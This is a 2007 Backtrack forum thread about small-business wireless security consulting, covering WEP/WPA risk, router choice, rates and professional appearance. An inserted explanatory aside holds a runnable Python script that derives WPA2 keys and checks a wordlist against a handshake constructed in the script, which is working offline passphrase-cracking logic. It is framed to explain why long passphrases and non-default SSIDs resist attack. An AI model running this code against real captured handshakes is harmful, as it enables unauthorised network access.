Informed Consulting
johnbear91
08-17-2007, 12:30 PM
Hello everyone, long time reader, first time poster. I run a small computer repair business. I mostly cater to home and small business. I do break/fix and consult on purchases and upgrades, and try to keep my clients up to date on what is going on in the world in layman's terms. I know enough that I have no business in the corporate field yet. Backtrack is a great way for me to learn the intricacies of security, and to better show my clients during a pentest session how easy it is for the bad guys to get in. I hope to not bother anyone, but I had a few questions as my work is suddenly booming with clients scared for their network's security. Mostly theoretical stuff, but I want to be able to give general figures and numbers without just guessing.
1) Most of my clients are in suburbia, city sizes around 30,000 each, what is the chance of a random hacker just coming by to break WEP/WPA encryption on a small business? Do hackers/crackers just go out driving and look for places to mess with? I know there are a lot of factors involved in this, I am just trying to be able to comfort my clients a bit. Of course this is assuming there aren't any direct enemies or ex-employees that hate the company.
2) What is a good brand of wireless router I might push on clients? I could sell them anything, as long as the price isn't too bad. I am looking for security and reliability, mostly for simple networks 2-10 people connected at any given time.
3) If there are any other home/small business consultants out there, what do you charge for your consulting sessions and/or setup of networks? I find myself switching between a flat rate of $250 to consult, setup, and secure a wireless network, and an hourly rate of $80. This seemed like a lot to me, but my clients love me and are more than happy to pay. I'm just more curious to know if I'm screwing them, being screwed, or about average.
Thank you again for taking the time to read this, even if you don't reply. Sorry I am long winded.
On a side note, someone posted earlier that a haircut and a nice suit goes a lot farther than actual experience. This sucks for some, but is completely true. I'm more the "cool haircut and power tie" kind of guy (no suit needed). It gets you through the door and makes clients not afraid to refer you, which is a big problem for self-employed, low-capital people like myself. If anyone has any questions about small business security work, feel free to ask, I'll do my best. I'm still getting a feel for the simple security aspect of consulting.
John
pipboy
08-17-2007, 01:28 PM
I'm not a professional, but yes, people do go around breaking stuff for kicks. Because WEP is gone in 60 seconds, in theory it wouldn't be too hard to crack every WEP you ran across. WPA on the other hand takes a little bit more work (and a nice rainbow table) and might be the deterrent you are looking for. If I was in your position I would personally take 10 minutes showing them how to connect to a WPA protected AP and maybe leave them a memo? Security through obscurity is almost nonexistent. Just because you didn't notice someone break in, it doesn't mean it didn't happen :P
blackfoot
08-17-2007, 01:50 PM
Thank you for your enquiry.
The current recommendation regarding security and encryption of wifi systems is WPA2. Coupling it with the AES algorithm is usually considered sufficient. Your clients should be advised that all wifi systems should be treated as having a lower grade of overall security because transmissions can in general be more easily intercepted. WPA2 is considered adequate for most residential and small business systems.
When supplying hardware, ensure that the systems supplied can handle WPA/WPA2 encryption. Cheaper lines, whilst adequate for general use, may not be suitable for advanced encryption. Many, many users still use WEP based encryption and access restriction. This is not adequate (though better than none!).
As with many aspects of ICT, the market moves rapidly. The marked increase in uptake of digital technologies during the next few years should encourage you to keep stocks low but offer a quick turnaround.
So-called hackers/crackers do make attempts at cracking. Evidenced in this forum are the number of juveniles for whom this is 'great fun'. However, one is often calmed with the knowledge that few if any have the intellect to do anything to follow up (as regards an effective network attack) and therefore whilst information security is paramount it must be balanced with effective backup and restoration procedures. Small businesses are more likely to suffer from data degradation internally (simple employee error) than from attacks.
It is difficult to comment on adequacy of consultancy rates. Mine are considerably higher but the work is different. I would say that you should feel comfortable with the rates you are charging for the type of work you are doing.
The purpose of this forum is to discuss the BT distribution and the collection of software/tools which it embraces. If you have any queries related to any particular aspects please let us know.
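The two posts above make the same point from different angles: WEP falls to a statistical attack in minutes, while WPA/WPA2-PSK costs the attacker real work per candidate passphrase and the "rainbow table" pipboy mentions only ever applies to one SSID. The example below is added here to show why; it is not code from either poster or from Backtrack. It implements the IEEE 802.11i passphrase-to-PMK derivation (PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations), the KCK portion of the PTK, and the WPA2 EAPOL MIC check an offline cracker performs against a captured 4-way handshake. The handshake it cracks is constructed in the script (MAC addresses, nonces and EAPOL bytes are made up), so it runs without a capture; the one externally known value is the 802.11i test vector for passphrase "password" on SSID "IEEE".

```python
import hashlib
import hmac
import time


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK) per IEEE 802.11i: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 iterations, 256-bit output.  The SSID salt is
    what ties any precomputed table to a single network name."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def ptk_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 128 bits of the PTK (the KCK) from the 802.11i PRF:
    HMAC-SHA1(PMK, "Pairwise key expansion" || 0x00 || data || counter),
    with data = min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces).
    Only PRF block 0 is needed because the KCK is the first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return hmac.new(pmk, b"Pairwise key expansion\x00" + data + b"\x00", hashlib.sha1).digest()[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2) MIC: HMAC-SHA1 truncated to 128 bits,
    computed over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def build_table(ssid: str, wordlist) -> dict:
    """The per-SSID precomputed table: passphrase -> PMK.  All of the
    PBKDF2 cost is paid here, once, and only for this SSID."""
    return {pw: wpa_pmk(pw, ssid) for pw in wordlist}


def crack_handshake(hs: dict, table: dict):
    """Offline check of every candidate against one captured handshake.
    Once the PMK is known, each candidate costs two cheap HMACs."""
    for pw, pmk in table.items():
        kck = ptk_kck(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return pw
    return None


def make_handshake(ssid: str, passphrase: str) -> dict:
    """Constructed stand-in for a sniffed 4-way handshake.  The addresses,
    nonces and EAPOL bytes below are invented for this example; a real
    capture would supply them.  The MIC is computed the way a real client would."""
    hs = {
        "aa": bytes.fromhex("001122334455"),      # AP (authenticator) MAC, constructed
        "spa": bytes.fromhex("66778899aabb"),     # client (supplicant) MAC, constructed
        "anonce": bytes(range(32)),               # constructed nonces
        "snonce": bytes(range(32, 64)),
        # message 2 of the handshake with the 16-byte MIC field zeroed (constructed)
        "eapol": bytes.fromhex("0103007502010a00") + bytes(8) + bytes(range(32, 64)) + bytes(64),
    }
    kck = ptk_kck(wpa_pmk(passphrase, ssid), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(kck, hs["eapol"])
    return hs


def pmk_rate(seconds: float = 1.0) -> float:
    """Rough number of passphrase candidates per second this CPU can derive
    without a precomputed table; this is the cost WEP does not impose."""
    n, t0 = 0, time.perf_counter()
    while time.perf_counter() - t0 < seconds:
        wpa_pmk("candidate%06d" % n, "IEEE")
        n += 1
    return n / (time.perf_counter() - t0)


if __name__ == "__main__":
    wordlist = ["letmein1", "password", "qwerty123"]
    table = build_table("IEEE", wordlist)
    print("cracked IEEE:", crack_handshake(make_handshake("IEEE", "password"), table))
    # Same passphrase, different SSID: the IEEE table is useless.
    print("cracked HomeNet with IEEE table:", crack_handshake(make_handshake("HomeNet", "password"), table))
    print("single-core PMK derivations/s:", round(pmk_rate(0.5)))
```

The second print is the practical point for a small-business client: a rented or downloaded table only helps an attacker against the default SSIDs it was built for, so a non-default SSID plus a long random passphrase pushes the attacker back to one PBKDF2 derivation per guess. WEP has no equivalent cost, which is why it is "gone in 60 seconds" regardless of key choice.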
johnbear91
08-18-2007, 01:24 AM
Thank you very much for your reply. As much as I would love to ask more questions specifically regarding backtrack, I am comfortable with what I know so far. Having backtrack on hand for me is more of a catch-all. Only when they are non-believers do I have to actually whip it out. Actual penetration testing is almost a moot point with a residential or small business network.
streaker69
08-18-2007, 01:35 AM
On a side note, someone posted earlier that a haircut and a nice suit goes a lot farther than actual experience. This sucks for some, but is completely true. I'm more the "cool haircut and power tie" kind of guy (no suit needed). It gets you through the door and makes clients not afraid to refer you, which is a big problem for self-employed, low-capital people like myself. If anyone has any questions about small business security work, feel free to ask, I'll do my best. I'm still getting a feel for the simple security aspect of consulting.
John
I don't agree with your first statement here at all. Look at Best Buy's DorkSquad, all of those assjacks wear collared shirt and tie, and most of them don't know a motherboard from their a-hole.
In my experience, experience counts for everything. Certifications are meaningless unless you have some experience to put behind them. Greedy schools ruined the market for MCSEs making a decent wage, and I see the same thing happening with the CEHs. Now that MCSEs are bagging groceries, everyone is jumping on the security bandwagon, hoping to be the next hotshot that finds the next big 'sploit.
When dealing with the public, it's more important to be polite, knowledgeable and truthful. Explain things in terms that they understand and don't scare them with tech talk.
johnbear91
08-18-2007, 03:01 AM
I both agree and disagree with you, but I feel it is more of a misunderstanding between us than an actual disagreement.
1) Geek Squad guys aren't what I was talking about by a haircut and a tie necessarily. What they wear can almost be considered a uniform, something akin to what you wear to a high school graduation. Advice for many of us that are fashion deficient: go find a professional woman or a gay guy and have them take you shopping. I know too many techs that aren't even aware they make dress shirts in any color other than white. Everyone has a color that looks good on them...find it. Geek Squad's stupid 'special agent' tie makes it so that a client will never take them very seriously. They will pay them, but they won't really feel good about it. Also, I'm not saying a haircut and tie will do your job for you, but it gets you in and it gets you out. What you do while you're there is your own business.
2) While Geek Squad are a bunch of dorks that keep their fingers on the format button at every turn, they still do a very large volume of business. I have the standard circle of nerd friends that are all very talented, but are struggling to pay bills. They don't know the first thing about business. You can survive by being an independent technician, but to actually make a good living you either need a rock-solid business plan, or be so damn pretty housewives just want to call you to have a man around. Neither of those fit the bill for most techs. I keep something in my mind whenever I am on site that keeps me focused. I just do whatever it is I would do if I were trying to date their daughter. It sounds cheesy but it keeps me professional. These people are paying me a lot of money, the least I can do is make them feel comfortable.
You are absolutely right, the key points: knowledgeable, truthful, and polite. Having my clients like me is important, but having them love me keeps my schedule full and my wallet bulging. Oh...and business cards...invest a few extra bucks for the not-shitty ones, it makes other people less ashamed to hand your card to friends.
If all I wanted to do was fix computers in some lab somewhere, without care for dress, hygiene, or anything but the finished product, it would be easy. However, the average consultant rarely has that luxury.